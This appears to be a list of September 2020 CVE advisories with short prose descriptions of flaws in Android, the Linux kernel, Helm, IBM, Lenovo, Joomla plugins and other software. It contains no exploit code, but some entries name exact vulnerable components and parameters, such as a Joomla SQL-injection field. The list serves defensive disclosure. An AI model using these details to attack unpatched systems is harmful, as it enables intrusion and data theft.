    In apexd, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-147002540 2020-09-17 not yet calculated CVE-2020-0322
    MISC
    google -- android_11_devices
     
    In the mp3 extractor, there is a possible out of bounds write due to uninitialized data. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-155171907 2020-09-17 not yet calculated CVE-2020-0321
    MISC
    google -- android_11_devices
     
    In libstagefright, there is a possible resource exhaustion due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-129282427 2020-09-17 not yet calculated CVE-2020-0320
    MISC
    google -- android_11_devices
     
    In the OMX encoder, there is a possible out of bounds read due to invalid input validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-63522940 2020-09-17 not yet calculated CVE-2020-0329
    MISC
    google -- android_11_devices
     
    In PackageInstaller, there is a possible permissions bypass due to a tapjacking vulnerability. This could lead to local escalation of privilege using an app set as the default Assist app with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-138443815 2020-09-17 not yet calculated CVE-2020-0366
    MISC
    google -- android_11_devices
     
    In devicepolicy service, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-155183624 2020-09-17 not yet calculated CVE-2020-0297
    MISC
    google -- android_11_devices
     
    In Battery Saver, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-153879099 2020-09-17 not yet calculated CVE-2020-0312
    MISC
    google -- android_11_devices
     
    In ADB server and USB server, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-153356209 2020-09-17 not yet calculated CVE-2020-0296
    MISC
    google -- android_11_devices
     
    In libmkvextractor, there is a possible resource exhaustion due to a missing bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-141860394 2020-09-17 not yet calculated CVE-2020-0287
    MISC
    google -- android_11_devices
     
    In screencap, there is a possible command injection due to improper input validation. This could lead to local escalation of privilege in a system process with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-123230379 2020-09-17 not yet calculated CVE-2020-0130
    MISC
    google -- android_11_devices
     
    In the Bluetooth server, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System privileges and a Firmware compromise needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-147227320 2020-09-18 not yet calculated CVE-2020-0309
    MISC
    google -- android_11_devices
     
    In the audio server, there is a missing permission check. This could lead to local escalation of privilege regarding audio settings with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-137015603 2020-09-18 not yet calculated CVE-2020-0089
    MISC
    google -- android_11_devices
     
    In the Media extractor, there is a possible use after free due to improper locking. This could lead to remote code execution in the media extractor with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-148223229 2020-09-17 not yet calculated CVE-2020-0303
    MISC
    google -- android_11_devices
     
    In UsageStatsManager, there is a possible access to protected data due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-119671929 2020-09-17 not yet calculated CVE-2020-0317
    MISC
    google -- android_11_devices
     
    In mediadrm, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-137282168 2020-09-17 not yet calculated CVE-2020-0125
    MISC
    google -- android_11_devices
     
    In the Settings app, there is an insecure default value. This could lead to local escalation of privilege and tapjacking with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-144507081 2020-09-18 not yet calculated CVE-2020-0271
    MISC
    google -- android_11_devices
     
    In WiFi tethering, there is a possible attacker controlled intent due to an unsafe PendingIntent. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-156353008 2020-09-18 not yet calculated CVE-2020-0262
    MISC
    google -- android_11_devices
     
    In Java network APIs, there is possible access to sensitive network state due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-141455849 2020-09-17 not yet calculated CVE-2020-0293
    MISC
    google -- android_11_devices
     
    In MediaProvider, there is a possible way to access ContentResolver and MediaStore entries the app shouldn't have access to due to a permissions bypass. This could lead to local escalation of privilege, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-150507736 2020-09-17 not yet calculated CVE-2020-0275
    MISC
    google -- android_11_devices
     
    In NetworkPolicyManagerService, there is a possible permissions bypass due to a missing permission check. This could lead to local escalation of privilege allowing a malicious app to modify the device's data plan with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-148627993 2020-09-17 not yet calculated CVE-2020-0277
    MISC
    google -- android_11_devices
     
    In tremolo, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-145790628 2020-09-17 not yet calculated CVE-2020-0270
    MISC
    google -- android_11_devices
     
    In the AAC parser, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-131430997 2020-09-17 not yet calculated CVE-2020-0279
    MISC
    google -- android_11_devices
     
    In NFC, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure. System execution privileges, a Firmware compromise, and User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-137857778 2020-09-18 not yet calculated CVE-2020-0281
    MISC
    google -- android_11_devices
     
    In NFC, there is a possible use-after-free due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-148294643 2020-09-18 not yet calculated CVE-2020-0268
    MISC
    google -- android_11_devices
     
    In PackageManager, there is a missing permission check. This could lead to local information disclosure across user boundaries with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-153995991 2020-09-17 not yet calculated CVE-2020-0288
    MISC
    google -- android_11_devices
     
    In libstagefright, there is a possible resource exhaustion due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-124940460 2020-09-17 not yet calculated CVE-2020-0301
    MISC
    google -- android_11_devices
     
    In PackageManager, there is a missing permission check. This could lead to local information disclosure across users with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-153996872 2020-09-17 not yet calculated CVE-2020-0289
    MISC
    google -- android_11_devices
     
    In PackageManager, there is a missing permission check. This could lead to local information disclosure across users with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-153996866 2020-09-17 not yet calculated CVE-2020-0290
    MISC
    google -- android_devices There is a possible out of bounds write due to an incorrect bounds check.Product: AndroidVersions: Android SoCAndroid ID: A-160812576 2020-09-17 not yet calculated CVE-2020-0342
    MISC
    google -- android_devices UNIQLO App for Android versions 7.3.3 and earlier allows remote attackers to lead a user to access an arbitrary website via a malicious App created by the third party. As a result, if the access destination is a malicious website, the user may fall victim to the social engineering attack. 2020-09-18 not yet calculated CVE-2020-5629
    MISC
    google -- android_devices In manifest files of the SmartSpace package, there is a possible tapjacking vector due to a missing permission check. This could lead to local escalation of privilege and account hijacking with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-156046804 2020-09-17 not yet calculated CVE-2020-0387
    MISC
    google -- android_devices In Pixel's use of the Catpipe library, there is possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-150730508 2020-09-17 not yet calculated CVE-2020-0434
    MISC
    google -- android_devices In various functions in fscrypt_ice.c and related files in some implementations of f2fs encryption that use encryption hardware which only supports 32-bit IVs (Initialization Vectors), 64-bit IVs are used and later are truncated to 32 bits. This may cause IV reuse and thus weakened disk encryption. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-153450752References: N/A 2020-09-17 not yet calculated CVE-2020-0407
    MISC
    google -- android_devices In create_pinctrl of core.c, there is a possible out of bounds read due to a use after free. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-140550171 2020-09-17 not yet calculated CVE-2020-0427
    MISC
    google -- android_devices In Parse_wave of eas_mdls.c, there is a possible out of bounds write due to an integer overflow. This could lead to remote information disclosure in a highly constrained process with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10 Android-11Android ID: A-150159669 2020-09-17 not yet calculated CVE-2020-0381
    MISC
    google -- android_devices
     
    In kbd_keycode of keyboard.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-144161459 2020-09-17 not yet calculated CVE-2020-0431
    MISC
    google -- android_devices
     
    In uvc_scan_chain_forward of uvc_driver.c, there is a possible linked list corruption due to an unusual root cause. This could lead to local escalation of privilege in the kernel with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-111893654References: Upstream kernel 2020-09-17 not yet calculated CVE-2020-0404
    MISC
    google -- android_devices
     
    In the FPC TrustZone fingerprint App, there is a possible invalid command handler due to an exposed test feature. This could lead to local escalation of privilege in the TEE, with System execution privileges required. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-131252923 2020-09-17 not yet calculated CVE-2020-0403
    MISC
    google -- android_devices
     
    In skb_to_mamac of networking.c, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-143560807 2020-09-17 not yet calculated CVE-2020-0432
    MISC
    google -- android_devices
     
    There is a possible out of bounds write due to an incorrect bounds check.Product: AndroidVersions: Android SoCAndroid ID: A-160812574 2020-09-17 not yet calculated CVE-2020-0278
    MISC
    google -- android_devices
     
    In blk_mq_queue_tag_busy_iter of blk-mq-tag.c, there is a possible use after free due to improper locking. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-151939299 2020-09-17 not yet calculated CVE-2020-0433
    MISC
    google -- android_devices
     
    In CamX code, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with System execution privileges required. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-123999783 2020-09-17 not yet calculated CVE-2020-0428
    MISC
    google -- android_devices
     
    In inline_data_addr of f2fs.h, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-133762747 2020-09-17 not yet calculated CVE-2020-0435
    MISC
    google -- android_devices
     
    In skb_headlen of /include/linux/skbuff.h, there is a possible out of bounds read due to memory corruption. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-153881554 2020-09-17 not yet calculated CVE-2020-0430
    MISC
    google -- android_devices
     
    There is a possible out of bounds write due to an incorrect bounds check.Product: AndroidVersions: Android SoCAndroid ID: A-149871374 2020-09-17 not yet calculated CVE-2020-0123
    MISC
    google -- android_devices
     
    UNIQLO App for Android versions 7.3.3 and earlier allows remote attackers to lead a user to access an arbitrary website via the vulnerable App. As a result, if the access destination is a malicious website, the user may fall victim to the social engineering attack. 2020-09-18 not yet calculated CVE-2020-5628
    MISC
    google -- android_devices
     
    There is a possible out of bounds write due to an incorrect bounds check.Product: AndroidVersions: Android SoCAndroid ID: A-156333725 2020-09-17 not yet calculated CVE-2020-0229
    MISC
    google -- android_devices
     
    In l2tp_session_delete and related functions of l2tp_core.c, there is possible memory corruption due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-152735806 2020-09-17 not yet calculated CVE-2020-0429
    MISC
    google -- brotli
     
    A buffer overflow exists in the Brotli library versions prior to 1.0.8 where an attacker controlling the input length of a "one-shot" decompression request to a script can trigger a crash, which happens when copying over chunks of data larger than 2 GiB. It is recommended to update your Brotli library to 1.0.8 or later. If one cannot update, we recommend to use the "streaming" API as opposed to the "one-shot" API, and impose chunk size limits. 2020-09-15 not yet calculated CVE-2020-8927
    CONFIRM
    google -- multiple_android_devices In showNotification of EmergencyCallbackModeService.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10 Android-11Android ID: A-154124307 2020-09-17 not yet calculated CVE-2020-0395
    MISC
    google -- multiple_android_devices In DecodeFrameCombinedMode of combined_decode.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11 Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-152496149 2020-09-17 not yet calculated CVE-2020-0245
    MISC
    google -- multiple_android_devices In showLimitedSimFunctionWarningNotification of NotificationMgr.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10 Android-11Android ID: A-153993591 2020-09-17 not yet calculated CVE-2020-0399
    MISC
    google -- multiple_android_devices
     
    In setInstallerPackageName of PackageManagerService.java, there is a missing permission check. This could lead to local escalation of privilege and granting spurious permissions with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10 Android-11Android ID: A-150857253 2020-09-17 not yet calculated CVE-2020-0401
    MISC
    google -- multiple_android_devices
     
    In the Bluetooth service, there is a possible spoofing attack due to a logic error. This could lead to remote information disclosure of sensitive information with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10 Android-11Android ID: A-150156492 2020-09-17 not yet calculated CVE-2020-0379
    MISC
    google -- multiple_android_devices
     
    In Parse_art of eas_mdls.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote information disclosure in the media extractor with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11 Android-8.0Android ID: A-150159906 2020-09-17 not yet calculated CVE-2020-0384
    MISC
    google -- multiple_android_devices
     
    In Parse_ins of eas_mdls.c, there is a possible out of bounds write due to a missing bounds check. This could lead to remote information disclosure in the media extractor process with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11 Android-8.0Android ID: A-150160279 2020-09-17 not yet calculated CVE-2020-0383
    MISC
    google -- multiple_android_devices
     
    In Parse_insh of eas_mdls.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote information disclosure in the media extractor with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.0 Android-8.1Android ID: A-150160041 2020-09-17 not yet calculated CVE-2020-0385
    MISC
    google -- multiple_android_devices
     
    In onCreate of RequestPermissionActivity.java, there is a possible tapjacking vector due to an insecure default value. This could lead to local escalation of privilege allowing an attacker to set Bluetooth discoverability with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10 Android-11Android ID: A-155650356 2020-09-17 not yet calculated CVE-2020-0386
    MISC
    google -- multiple_android_devices
     
    In applyPolicy of PackageManagerService.java, there is possible arbitrary command execution as System due to an unenforced protected-broadcast. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11Android ID: A-158570769 2020-09-17 not yet calculated CVE-2020-0391
    MISC
    google -- multiple_android_devices
     
    In decrypt and decrypt_1_2 of CryptoPlugin.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11Android ID: A-154123412 2020-09-17 not yet calculated CVE-2020-0393
    MISC
    google -- multiple_android_devices
     
    In verifyIntentFiltersIfNeeded of PackageManagerService.java, there is a possible settings bypass allowing an app to become the default handler for arbitrary domains. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-146204120 2020-09-17 not yet calculated CVE-2020-0074
    MISC
    google -- multiple_android_devices
     
    In allocExcessBits of bitalloc.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-146398979 2020-09-17 not yet calculated CVE-2020-0380
    MISC
    google -- multiple_android_devices
     
    In onCreate of BluetoothPairingDialog.java, there is a possible tapjacking vector due to an insecure default value. This could lead to local escalation of privilege and untrusted devices accessing contact lists with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10 Android-11Android ID: A-155648639 2020-09-17 not yet calculated CVE-2020-0394
    MISC
    google -- multiple_android_devices
     
    In various places in Telephony, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11 Android-8.0Android ID: A-155094269 2020-09-17 not yet calculated CVE-2020-0396
    MISC
    google -- multiple_android_devices
     
    In getNotificationBuilder of CarrierServiceStateTracker.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11 Android-8.0Android ID: A-155092443 2020-09-17 not yet calculated CVE-2020-0397
    MISC
    google -- multiple_android_devices
     
    In getLayerDebugInfo of SurfaceFlinger.cpp, there is a possible code execution due to a double free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11Android ID: A-150226608 2020-09-17 not yet calculated CVE-2020-0392
    MISC
    helm -- helm
     
    In Helm before versions 2.16.11 and 3.3.2, a Helm repository can contain duplicates of the same chart, with the last one always used. If a repository is compromised, this lowers the level of access that an attacker needs to inject a bad chart into a repository. To perform this attack, an attacker must have write access to the index file (which can occur during a MITM attack on a non-SSL connection). This issue has been patched in Helm 3.3.2 and 2.16.11. A possible workaround is to manually review the index file in the Helm repository cache before installing software. 2020-09-17 not yet calculated CVE-2020-15185
    MISC
    CONFIRM
    helm -- helm
     
    In Helm before versions 2.16.11 and 3.3.2 there is a bug in which the `alias` field on a `Chart.yaml` is not properly sanitized. This could lead to the injection of unwanted information into a chart. This issue has been patched in Helm 3.3.2 and 2.16.11. A possible workaround is to manually review the `dependencies` field of any untrusted chart, verifying that the `alias` field is either not used, or (if used) does not contain newlines or path characters. 2020-09-17 not yet calculated CVE-2020-15184
    MISC
    CONFIRM
    helm -- helm
     
    In Helm before versions 2.16.11 and 3.3.2 plugin names are not sanitized properly. As a result, a malicious plugin author could use characters in a plugin name that would result in unexpected behavior, such as duplicating the name of another plugin or spoofing the output to `helm --help`. This issue has been patched in Helm 3.3.2. A possible workaround is to not install untrusted Helm plugins. Examine the `name` field in the `plugin.yaml` file for a plugin, looking for characters outside of the [a-zA-Z0-9._-] range. 2020-09-17 not yet calculated CVE-2020-15186
    MISC
    CONFIRM
    helm -- helm
     
    In Helm before versions 2.16.11 and 3.3.2, a Helm plugin can contain duplicates of the same entry, with the last one always used. If a plugin is compromised, this lowers the level of access that an attacker needs to modify a plugin's install hooks, causing a local execution attack. To perform this attack, an attacker must have write access to the git repository or plugin archive (.tgz) while being downloaded (which can occur during a MITM attack on a non-SSL connection). This issue has been patched in Helm 2.16.11 and Helm 3.3.2. As a possible workaround make sure to install plugins using a secure connection protocol like SSL. 2020-09-17 not yet calculated CVE-2020-15187
    MISC
    CONFIRM
    hewlett_packard -- enterprise_universal_api_framework
     
    A potential security vulnerability has been identified in Hewlett Packard Enterprise Universal API Framework. The vulnerability could be remotely exploited to allow SQL injection in HPE Universal API Framework for VMware Esxi v2.5.2 and HPE Universal API Framework for Microsoft Hyper-V (VHD). 2020-09-18 not yet calculated CVE-2020-24623
    MISC
    huawei -- taurus-anoob_devices
     
    Taurus-AN00B versions earlier than 10.1.0.156(C00E155R7P2) have a use-after-free (UAF) vulnerability. An authenticated, local attacker may perform specific operations to exploit this vulnerability. Successful exploitation may cause the attacker to obtain a higher privilege and compromise the service. 2020-09-18 not yet calculated CVE-2020-9084
    MISC
    ibm -- bladecenter_advanced_management_module
     
    A cross-site scripting inclusion (XSSI) vulnerability was reported in the legacy IBM BladeCenter Advanced Management Module (AMM) web interface prior to version 3.68n [BPET68N]. This vulnerability could allow an authenticated user's AMM credentials to be disclosed if the user is convinced to visit a malicious web site, possibly through phishing. Successful exploitation requires specific knowledge about the user?s network to be included in the malicious web site. Impact is limited to the normal access restrictions of the user visiting the malicious web site, and subject to the user being logged into AMM, being able to connect to both AMM and the malicious web site while the web browser is open, and using a web browser that does not inherently protect against this class of attack. The JavaScript code is not executed on AMM itself. 2020-09-15 not yet calculated CVE-2020-8339
    MISC
    ibm -- maximo_asset_management
     
    IBM Maximo Asset Management 7.6.0 and 7.6.1 could allow a remote attacker to conduct phishing attacks, using a tabnabbing attack. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to redirect a user to a malicious Web site that would appear to be trusted. This could allow the attacker to obtain highly sensitive information or conduct further attacks against the victim. IBM X-Force ID: 179537. 2020-09-16 not yet calculated CVE-2020-4409
    XF
    CONFIRM
    ibm -- security_trusteer_pinpoint_detect
     
    IBM Security Trusteer Pinpoint Detect 11.6.5 could disclose some information due to using a wildcard in the Access-Control-Allow-Origin header. IBM X-Force ID: 187371. 2020-09-16 not yet calculated CVE-2020-4708
    XF
    CONFIRM
    installbuilder -- installbuilder
     
    InstallBuilder for Qt Windows (versions prior to 20.7.0) installers look for plugins at a predictable location at initialization time, writable by non-admin users. While those plugins are not required, they are loaded if present, which could allow an attacker to plant a malicious library which could result in code execution with the security scope of the installer. 2020-09-18 not yet calculated CVE-2020-3979
    MISC
    intel -- multiple_products
     
    Logic error in BIOS firmware for 8th, 9th and 10th Generation Intel(R) Core(TM) Processors may allow an unauthenticated user to potentially enable escalation of privilege, denial of service and/or information disclosure via physical access. 2020-09-14 not yet calculated CVE-2020-24457
    MISC
    jenkins -- jenkins
     
    A cross-site request forgery (CSRF) vulnerability in Jenkins MongoDB Plugin 1.3 and earlier allows attackers to gain access to some metadata of any arbitrary files on the Jenkins controller. 2020-09-16 not yet calculated CVE-2020-2268
    MLIST
    CONFIRM
    joomla -- joomla!
     
    The paGO Commerce plugin 2.5.9.0 for Joomla! allows SQL Injection via the administrator/index.php?option=com_pago&view=comments filter_published parameter. 2020-09-18 not yet calculated CVE-2020-25751
    MISC
    MISC
    json-bigint -- json-bigint
     
    Prototype pollution in json-bigint npm package < 1.0.0 may lead to a denial-of-service (DoS) attack. 2020-09-18 not yet calculated CVE-2020-8237
    MISC
    lenovo --
     
    A race condition vulnerability was reported in Lenovo System Update prior to version 5.07.0106 that could allow escalation of privilege. 2020-09-15 not yet calculated CVE-2020-8342
    MISC
    lenovo -- system_x_imm2
     
    A cross-site scripting (XSS) vulnerability was discovered in the legacy IBM and Lenovo System x IMM2 (Integrated Management Module 2), prior to version 5.60, embedded Baseboard Management Controller (BMC) web interface during an internal security review. This vulnerability could allow JavaScript code to be executed in the user's web browser if the user is convinced to visit a crafted URL, possibly through phishing. Successful exploitation requires specific knowledge about the user?s network to be included in the crafted URL. Impact is limited to the normal access restrictions and permissions of the user clicking the crafted URL, and subject to the user being able to connect to and already being authenticated to IMM2 or other systems. The JavaScript code is not executed on IMM2 itself. 2020-09-15 not yet calculated CVE-2020-8340
    MISC
    lenovo -- vantage
     
    A denial of service vulnerability was reported in the Lenovo Vantage component called Lenovo System Interface Foundation prior to version 1.1.19.5 that could allow configuration files to be written to non-standard locations. 2020-09-15 not yet calculated CVE-2020-8346
    MISC
    lg -- multiple_products
     
    A vulnerability that can hijack a DLL file that is loaded during products(LGPCSuite_Setup, IPSFULLHD, LG_ULTRAWIDE, ULTRA_HD_Driver Setup) installation into a DLL file that the hacker wants. Missing Support for Integrity Check vulnerability in ____COMPONENT____ of LG Electronics (LGPCSuite_Setup), (IPSFULLHD, LG_ULTRAWIDE, ULTRA_HD_Driver Setup) allows ____ATTACKER/ATTACK____ to cause ____IMPACT____. This issue affects: LG Electronics; LGPCSuite_Setup : 1.0.0.3 on Windows(x86, x64); IPSFULLHD, LG_ULTRAWIDE, ULTRA_HD_Driver Setup : 1.0.0.9 on Windows(x86, x64). 2020-09-14 not yet calculated CVE-2020-7807
    MISC
    MISC
    libraw -- libraw
     
    libraw 20.0 has a null pointer dereference vulnerability in parse_tiff_ifd in src/metadata/tiff.cpp, which may result in context-dependent arbitrary code execution. 2020-09-16 not yet calculated CVE-2020-24890
    MISC
    libraw -- libraw
     
    A buffer overflow vulnerability in LibRaw version < 20.0 LibRaw::GetNormalizedModel in src/metadata/normalize_model.cpp may lead to context-dependent arbitrary code execution. 2020-09-16 not yet calculated CVE-2020-24889
    MISC
    linux -- linux_kernel A flaw was found in the Linux Kernel before 5.8-rc1 in the prctl() function, where it can be used to enable indirect branch speculation after it has been disabled. This call incorrectly reports it as being 'force disabled' when it is not and opens the system to Spectre v2 attacks. The highest threat from this vulnerability is to confidentiality. 2020-09-16 not yet calculated CVE-2020-10768
    CONFIRM
    MISC
    linux -- linux_kernel
     
    A flaw was found in the Linux kernel?s implementation of the invert video code on VGA consoles when a local attacker attempts to resize the console, calling an ioctl VT_RESIZE, which causes an out-of-bounds write to occur. This flaw allows a local user with access to the VGA console to crash the system, potentially escalating their privileges on the system. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. 2020-09-15 not yet calculated CVE-2020-14331
    MISC
    MISC
    MISC
    linux -- linux_kernel
     
    A memory disclosure flaw was found in the Linux kernel's ethernet drivers, in the way it read data from the EEPROM of the device. This flaw allows a local user to read uninitialized values from the kernel memory. The highest threat from this vulnerability is to confidentiality. 2020-09-15 not yet calculated CVE-2020-14304
    MISC
    CONFIRM
    linux -- linux_kernel
     
    A flaw was found in the Linux kernel in versions from 2.2.3 through 5.9.rc5. When changing screen size, an out-of-bounds memory write can occur leading to memory corruption or a denial of service. This highest threat from this vulnerability is to system availability. 2020-09-18 not yet calculated CVE-2020-14390
    MISC
    MISC
    MISC
    linux -- linux_kernel
     
    A memory out-of-bounds read flaw was found in the Linux kernel before 5.9-rc2 with the ext3/ext4 file system, in the way it accesses a directory with broken indexing. This flaw allows a local user to crash the system if the directory exists. The highest threat from this vulnerability is to system availability. 2020-09-15 not yet calculated CVE-2020-14314
    CONFIRM
    MISC
    MISC
    linux -- linux_kernel
     
    A logic bug flaw was found in Linux kernel before 5.8-rc1 in the implementation of SSBD. A bug in the logic handling allows an attacker with a local account to disable SSBD protection during a context switch when additional speculative execution mitigations are in place. This issue was introduced when the per task/process conditional STIPB switching was added on top of the existing SSBD switching. The highest threat from this vulnerability is to confidentiality. 2020-09-15 not yet calculated CVE-2020-10766
    CONFIRM
    MISC
    linux -- linux_kernel
     
    A flaw was found in the Linux kernel before 5.8-rc1 in the implementation of the Enhanced IBPB (Indirect Branch Prediction Barrier). The IBPB mitigation will be disabled when STIBP is not available or when the Enhanced Indirect Branch Restricted Speculation (IBRS) is available. This flaw allows a local attacker to perform a Spectre V2 style attack when this configuration is active. The highest threat from this vulnerability is to confidentiality. 2020-09-15 not yet calculated CVE-2020-10767
    CONFIRM
    MISC
    linux -- linux_kernel
     
    A flaw was found in the Linux Kernel before 5.8-rc6 in the ZRAM kernel module, where a user with a local account and the ability to read the /sys/class/zram-control/hot_add file can create ZRAM device nodes in the /dev/ directory. This read allocates kernel memory and is not accounted for a user that triggers the creation of that ZRAM device. With this vulnerability, continually reading the device may consume a large amount of system memory and cause the Out-of-Memory (OOM) killer to activate and terminate random userspace processes, possibly making the system inoperable. 2020-09-16 not yet calculated CVE-2020-10781
    CONFIRM
    MISC
    MISC
    linux -- linux_kernel
     
    A flaw was found in the Linux kernel before 5.9-rc4. Memory corruption can be exploited to gain root privileges from unprivileged processes. The highest threat from this vulnerability is to data confidentiality and integrity. 2020-09-16 not yet calculated CVE-2020-14386
    CONFIRM
    MISC
    MISC
    linux -- linux_kernel
     
